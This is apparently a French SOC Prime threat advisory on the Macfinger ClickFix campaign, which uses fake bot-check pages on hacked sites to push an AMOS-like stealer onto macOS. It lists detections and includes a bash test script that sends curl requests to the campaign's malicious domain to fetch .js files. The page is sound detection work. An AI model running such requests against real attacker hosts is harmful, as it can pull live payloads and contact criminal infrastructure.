SOC Prime Bias: High

24 Sep 2026 06:40 UTC

Campagne Macfinger ClickFix

Author Photo
SOC Prime Team linkedin icon Suivre
Campagne Macfinger ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Une nouvelle campagne d’ingénierie sociale suivie sous le nom de Macfinger ClickFix cible les utilisateurs de macOS en injectant des scripts malveillants dans des sites web légitimes. L’attaque présente des pages de protection contre les robots factices qui trompent les victimes en exécutant des commandes qui téléchargent des malwares spécifiques à macOS. La charge utile semble être une variante du voleur macOS Atomic (AMOS) conçue pour voler des identifiants et d’autres informations utilisateur.

Enquête

L’enquête a identifié des sites web légitimes compromis avec des scripts injectés qui affichent de faux pop-ups de vérification. L’analyse du trafic réseau a révélé un domaine dédié utilisé pour le suivi des utilisateurs, avec plusieurs adresses IP soutenant la livraison de logiciels malveillants et les communications de Commandement et de Contrôle (C2). Les schémas de trafic observés indiquent une exfiltration d’informations d’identifiants et de système via des requêtes HTTP POST.

Atténuation

Les utilisateurs doivent être formés pour éviter de suivre les instructions présentées par des pop-ups inattendus du navigateur ou des pages de vérification de robots factices. Les organisations doivent déployer un filtrage web pour bloquer les domaines malveillants connus et les adresses IP associées aux campagnes ClickFix. La surveillance des connexions sortantes inhabituelles vers des adresses IP non fiables sur des ports non standard est également recommandée.

Réponse

Si une activité de Macfinger ClickFix est détectée, les hôtes macOS affectés doivent être immédiatement isolés pour arrêter toute exfiltration de données supplémentaire. Les intervenants doivent effectuer une enquête judiciaire complète pour déterminer l’étendue de la compromission des identifiants. Les identifiants potentiellement exposés devraient être réinitialisés, et les systèmes devraient être vérifiés pour des mécanismes de persistance tels que des scripts shell non autorisés ou des binaires Mach-O.

Flux d’attaque

Nous mettons toujours à jour cette partie.

Détections

Tentative possible de communication de domaine par recherche IP (via dns)

Équipe de SOC Prime
23 sept. 2026

Commande et contrôle suspect par demande DNS de domaine de premier niveau inhabituel (TLD) (via dns)

Équipe de SOC Prime
23 sept. 2026

Tentative possible d’énumération System_profiler (via process_creation)

Équipe de SOC Prime
23 sept. 2026

Manipulation possible de chaînes encodées en Base64 [MacOS] (via cmdline)

Équipe de SOC Prime
23 sept. 2026

Tentative suspecte d’exécution de Curl [MacOS] (via cmdline)

Équipe de SOC Prime
23 sept. 2026

IOCs (HashSha256) pour détecter : campagne Macfinger ClickFix

Règles AI de SOC Prime
23 sept. 2026

IOCs (SourceIP) pour détecter : campagne Macfinger ClickFix

Règles AI de SOC Prime
23 sept. 2026

IOCs (DestinationIP) pour détecter : campagne Macfinger ClickFix

Règles AI de SOC Prime
23 sept. 2026

Détecter le trafic de la campagne Macfinger ClickFix [Pare-feu]

Règles AI de SOC Prime
23 sept. 2026

Détecter l’injection de script Macfinger ClickFix [Serveur web]

Règles AI de SOC Prime
23 sept. 2026

Exécution de simulation

  • Narration et commandes de l’attaque : Un adversaire utilise une technique d’ingénierie sociale connue sous le nom de « ClickFix », où un utilisateur est invité à cliquer sur un bouton (souvent un faux « correctif » ou « mise à jour ») qui exécute un script malveillant. Dans cette simulation, nous imitons la phase finale : le navigateur/agent côté client effectuant une requête vers le domaine contrôlé par Macfinger velvet-otter-glagceis.life pour récupérer un .js fichier malveillant. Cette demande est conçue pour correspondre à l’un des trois critères de sélection spécifiques dans la logique de détection.

  • Script de test de régression :

    #!/bin/bash
    # Script de simulation pour déclencher la règle de détection Macfinger ClickFix
    
    echo "[*] Démarrage de la simulation Macfinger ClickFix..."
    
    # Cible 1 : sélection1 (paramètre site)
    echo "[*] Simulation de la requête vers sélection1..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload"
    
    # Cible 2 : sélection2 (fichier de hachage spécifique)
    echo "[*] Simulation de la requête vers sélection2..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js"
    
    # Cible 3 : sélection3 (fichier ext-b)
    echo "[*] Simulation de la requête vers sélection3..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js"
    
    echo "[+] Simulation complète. Vérifiez les alertes dans le SIEM."
  • Commandes de nettoyage :

    # Aucun nettoyage local requis car ce sont des requêtes réseau sortantes.
    # Si des fichiers locaux ont été créés, supprimez-les :
    rm -f /tmp/macfinger_test_*